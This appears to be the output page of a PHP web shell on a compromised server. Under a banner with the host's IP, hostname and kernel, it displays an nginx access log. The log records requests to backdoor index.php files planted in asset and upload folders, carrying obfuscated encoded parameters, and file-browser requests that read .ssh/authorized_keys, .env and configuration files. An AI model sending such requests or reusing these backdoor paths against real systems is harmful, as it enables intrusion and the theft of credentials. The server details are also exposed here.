uawdijnntqw1x1x1
IP : 216.73.216.46
Hostname : toronto-dev2
Kernel : Linux toronto-dev2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
srv
/
users
/
craft4
/
.ssh
/
..
/
run
/
..
/
log
/
craft4-newsite-space
/
craft4-newsite-space_nginx.access_ssl.log
/
/
62.164.177.242 - - [21/Aug/2025:06:26:08 -0400] "GET /assets/libs/bootstrap-datetimepicker/bootstrap-datetimepicker/index.php?of=1 HTTP/2.0" 200 2250 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.35" "62.164.177.242" 326 0.013 "5806" "0.014" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:27:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.ssh%2Fauthorized_keys HTTP/2.0" 200 3292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 312 0.009 "5558" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:27:20 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.ssh%2F.. HTTP/2.0" 200 1689 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 69 0.005 "17595" "0.005" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:28:35 -0400] "GET /1cefc/1cefc/1cefc/index.php?ARRAY=7o2230223n313735353737353731302p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737323131302q3431323633383665326263303738363938643464313132666132316664376232222p2232223n223931306530353032623265373161303732363661626634393935383536626464222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p2262696r675s70617373223n2231322q34372q35362q36342q37342q38332q3234227q HTTP/2.0" 200 346 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_1_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 663 5.450 "1114" "5.450" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:28:43 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.ssh%2F. HTTP/2.0" 200 1378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 302 0.005 "5804" "0.005" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:29:19 -0400] "GET /assets/libs/magnific-popup/css/css/index.php?of=1 HTTP/2.0" 200 2022 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" "62.164.177.242" 308 0.006 "5061" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:29:37 -0400] "GET /cpresources/7683ad58/7683ad58/index.php?ARRAY=7o2230223n313735353737353737362p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737323137362q3132613262386362363163333162663031666537353161653261333637653233222p2232223n226132663166656537333965316161373165663532643664663936306263356236222p2233223n226339633562653961386430343738323062363565643765653533613336383838222p2262696r675s70617373223n2232362q33362q36302q36322q38302q38312q3133227q HTTP/2.0" 200 311 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1" "62.164.177.242" 670 0.844 "981" "0.844" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:34:45 -0400] "GET /order/files/files/index.php?ARRAY=7o2230223n313735353737363038342p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737323438342q6531623661616530303932616265376231663563306362633765623736633532222p2232223n223834636263323665646465346636623836313732356336643266643562386233222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p2262696r675s70617373223n2231392q34392q35342q36342q37372q39302q3233227q HTTP/2.0" 200 301 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/83.0.1055.1 Safari/535.24" "62.164.177.242" 642 0.841 "909" "0.841" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:38:41 -0400] "GET /30a37/30a37/index.php?ARRAY=7o2230223n313735353737363332302p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737323732302q3766383133326165623361366232366462356562383039623964643837633665222p2232223n226334353133383733393633613765373731646336343334663136333134353037222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p2262696r675s70617373223n2232322q33312q35312q36342q37352q39302q3137227q HTTP/2.0" 200 352 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" "62.164.177.242" 647 0.877 "1074" "0.877" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:39:42 -0400] "GET /3534f/3534f/3534f/3534f/3534f/index.php?ARRAY=7o2230223n313735353737363338312p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737323738312q3531633533333636323135633361386639616636643464666639303036383437222p2232223n226364313236363239633634616336613130633433306661346334636335643535222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p2262696r675s70617373223n2232322q34372q35332q36382q37362q39302q3136227q HTTP/2.0" 200 346 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/103.0" "62.164.177.242" 633 0.841 "1185" "0.841" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:41:17 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fplugins HTTP/2.0" 200 1489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 333 0.010 "10544" "0.010" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:41:20 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fbootstrap.php HTTP/2.0" 200 1198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 101 0.003 "3311" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:41:23 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fmodules%2Fcontrollers HTTP/2.0" 200 1441 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 97 0.004 "7580" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:41:26 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fmodules%2FModule.php HTTP/2.0" 200 1579 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 96 0.004 "4285" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:42:08 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fcomposer.lock HTTP/2.0" 200 27653 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 336 0.017 "284417" "0.017" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:42:08 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2Ff7c78%2F.. HTTP/2.0" 200 1508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.003 "9966" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:42:11 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fmodules%2F.. HTTP/2.0" 200 1716 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 90 0.005 "19445" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:42:14 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2Ff7c78%2Fcache.php HTTP/2.0" 200 4771 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 108 0.003 "7884" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:43:46 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fmodules HTTP/2.0" 200 1498 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 332 0.009 "9506" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:43:48 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2Ff7c78%2Ff7c78 HTTP/2.0" 200 1497 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.003 "9996" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:43:51 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2Ff7c78%2Findex.php HTTP/2.0" 200 933 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.003 "2935" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:44:23 -0400] "GET /?ARRAY=7o2230223n313735353737363636322p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737333036322q3464303761353339386238626438343635336338656265363362343532393032222p2232223n223534313835386363633734306464336661653633386637643039343464383561222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p2262696r675s70617373223n2231352q34352q35332q36342q37372q38362q3135227q HTTP/2.0" 200 19 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:74.0) Gecko/20100101 Firefox/74.0" "62.164.177.242" 597 0.828 "15" "0.829" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:44:44 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fstorage HTTP/2.0" 200 1601 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 332 0.009 "14502" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:44:47 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Ff7c78 HTTP/2.0" 200 1506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 102 0.004 "9830" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:44:50 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fmodules%2Fassets HTTP/2.0" 200 1367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 92 0.004 "6300" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:45:14 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Ftemplates HTTP/2.0" 200 1562 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 333 0.008 "12575" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:45:17 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.. HTTP/2.0" 200 1367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 94 0.004 "6409" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:45:20 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fmodules%2Fadjusters HTTP/2.0" 200 1421 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 94 0.004 "6445" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:46:46 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fcraft HTTP/2.0" 200 1090 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 332 0.008 "3042" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:46:49 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.env.example HTTP/2.0" 200 1198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 101 0.003 "3220" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:46:52 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fpublic HTTP/2.0" 200 2079 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 95 0.003 "35681" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:47:12 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor HTTP/2.0" 200 2496 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 332 0.009 "59279" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:47:15 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.env HTTP/2.0" 200 1303 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 95 0.004 "3345" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:47:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fconfig HTTP/2.0" 200 1602 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 95 0.004 "13678" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:48:25 -0400] "GET /assets/libs/bootstrap-datetimepicker/bootstrap-datetimepicker/index.php?ARRAY=7o2230223n313735353737363930342p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737333330342q6236306232373464653333633065393234363630393734623466666433303766222p2232223n223831313939386463346661633836336339653962313735663463343932643463222p2233223n223330383332396133393332633765343031373463343963326233323930333265222p2262696r675s70617373223n2232392q33362q35362q36342q37312q38352q3130227q HTTP/2.0" 200 369 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1" "62.164.177.242" 692 0.840 "1412" "0.840" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:48:46 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fmodules%2F. HTTP/2.0" 200 1479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 325 0.008 "9249" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:48:49 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2Ff7c78%2F. HTTP/2.0" 200 1472 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 104 0.004 "8823" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:49:04 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.gitignore HTTP/2.0" 200 943 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 334 0.008 "2753" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:49:06 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fcomposer.json HTTP/2.0" 200 1390 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 101 0.003 "4546" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:49:13 -0400] "GET /30a37/30a37/30a37/30a37/index.php?of=1 HTTP/2.0" 200 2313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" "62.164.177.242" 274 0.003 "5840" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:49:27 -0400] "GET /order/files/2023-01/2023-01/index.php?ARRAY=7o2230223n313735353737363936362p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737333336362q6561623539323238633932343864303533336239373234613237663736386566222p2232223n226165353331623136366433393135323731333437616631653234663030363265222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p2262696r675s70617373223n2231372q33332q35332q36392q37372q38312q3231227q HTTP/2.0" 200 309 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/82.0.1055.1 Safari/535.24" "62.164.177.242" 649 0.883 "967" "0.882" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:06:50:38 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F. HTTP/2.0" 200 1717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 328 0.008 "19578" "0.009" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:50:47 -0400] "GET /1cefc/1cefc/1cefc/index.php?of=1 HTTP/2.0" 200 1994 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" "62.164.177.242" 267 0.003 "5188" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:52:05 -0400] "GET /order/files/2023-07/c9b92769-9d4a-4fe2-90ce-e5c37234ab05/_68x16_crop_center-center_none/_68x16_crop_center-center_none/index.php?of=1 HTTP/2.0" 200 1983 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" "62.164.177.242" 368 0.008 "5181" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:54:00 -0400] "GET /assets/libs/modal-video/lib/adaptor/adaptor/index.php?ARRAY=7o2230223n313735353737373233392p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737333633392q3834306336613632643830663833333665396532393361653936346665363232222p2232223n223235633536343338306436346531383461616437383261376236663237333934222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p2262696r675s70617373223n2232382q33342q35312q36362q37392q38382q3237227q HTTP/2.0" 200 348 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.3282.140 Safari/537.36 Edge/18.17763" "62.164.177.242" 677 0.818 "1249" "0.818" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:56:16 -0400] "GET /order/files/2023-07/c9b92769-9d4a-4fe2-90ce-e5c37234ab05/_350x82_crop_center-center_none/_350x82_crop_center-center_none/index.php?of=1 HTTP/2.0" 200 2284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0" "62.164.177.242" 336 0.010 "5878" "0.010" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:56:36 -0400] "GET /cpresources/e9e49845/images/images/index.php?of=1 HTTP/2.0" 200 2296 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 283 0.009 "5946" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:57:17 -0400] "GET /assets/libs/modal-video/modal-video/modal-video/index.php?of=1 HTTP/2.0" 200 2285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" "62.164.177.242" 322 0.007 "6008" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:57:58 -0400] "GET /?ARRAY=7o2230223n313735353737373437372p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737333837372q3832323233633335353664666333356661626339656139303162666338633634222p2232223n223534313835386363633734306464336661653633386637643039343464383561222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p2262696r675s70617373223n2231352q34352q35332q36342q37372q38362q3135227q HTTP/2.0" 200 19 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/83.0.1055.1 Safari/535.24" "62.164.177.242" 624 0.832 "15" "0.831" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:06:58:58 -0400] "GET /assets/libs/modal-video/js/js/index.php?ARRAY=7o2230223n313735353737373533372p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737333933372q6361343637613630653064333061636336323166383464346137333139383930222p2232223n223134366361333163633938323562326236323630616233636365363366353231222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p2262696r675s70617373223n2232342q33352q36302q36392q37322q38352q3232227q HTTP/2.0" 200 343 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_1_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 673 0.844 "1123" "0.844" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:01:20 -0400] "GET /3534f/3534f/3534f/index.php?of=1 HTTP/2.0" 200 2084 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.3292.140 Safari/537.36 Edge/18.18761" "62.164.177.242" 307 0.007 "5286" "0.006" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:02:00 -0400] "GET /f7c78/f7c78/f7c78/f7c78/index.php?of=1 HTTP/2.0" 200 2348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/102.0" "62.164.177.242" 276 0.010 "6241" "0.010" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:03:41 -0400] "GET /cpresources/e9e49845/images/images/index.php?ARRAY=7o2230223n313735353737373831392p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737343231392q3232646464336537663537313036646363663961663366313234373764356666222p2232223n223239346364653734343334616463363466386236313265623531373566633934222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p2262696r675s70617373223n2232362q34342q35392q36352q37372q38352q3234227q HTTP/2.0" 200 315 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 677 0.999 "1011" "0.999" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:04:06 -0400] "GET /assets/libs/modal-video/js/js/index.php?of=1 HTTP/2.0" 200 2235 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.4 Mobile/15E148 Safari/604.1" "62.164.177.242" 322 0.006 "5809" "0.006" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:04:16 -0400] "GET /1cefc/1cefc/1cefc/index.php?of=1 HTTP/2.0" 200 1994 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/10.0.4 Mobile/15E148 Safari/604.1" "62.164.177.242" 312 0.006 "5188" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:07:35 -0400] "GET /assets/libs/modal-video/modal-video/index.php?ARRAY=7o2230223n313735353737383035342p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737343435342q3239666638373435303332643163643938336162333361333364356663343062222p2232223n223734646562303961366664386239356135323736323732653530663034336565222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p2262696r675s70617373223n2232362q34392q35372q36342q37312q38342q3233227q HTTP/2.0" 200 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/103.0" "62.164.177.242" 635 0.834 "1021" "0.834" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:08:41 -0400] "GET /1cefc/1cefc/1cefc/index.php?ARRAY=7o2230223n313735353737383132312p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737343532312q3236626230643164336235613439366631633866616531646232313763323033222p2232223n226130376138383530356431646537663164393932393464646263323935323239222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p2262696r675s70617373223n2232392q34362q35372q36352q37372q38362q3235227q HTTP/2.0" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" "62.164.177.242" 617 0.007 "0" "0.007" "test.newsite.space"
